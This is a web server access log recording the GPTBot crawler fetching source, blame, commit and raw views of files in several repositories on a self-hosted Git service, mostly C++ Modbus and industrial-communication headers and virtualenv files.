- GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10444] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10444] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10414] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12049] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12049] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13336] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11597] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?files=.gitignore" [Client 74.7.227.38] [Length 15453] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" +[17/Feb/2026:15:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 12648] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:15:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:15:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:15:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 10095] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" +[17/Feb/2026:15:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11292] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10236] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11292] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10682] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13923] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 10320] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 15776] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9965] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9977] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 19852] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 11040] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 19886] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 11070] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include" +[17/Feb/2026:15:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 17264] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:15:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr 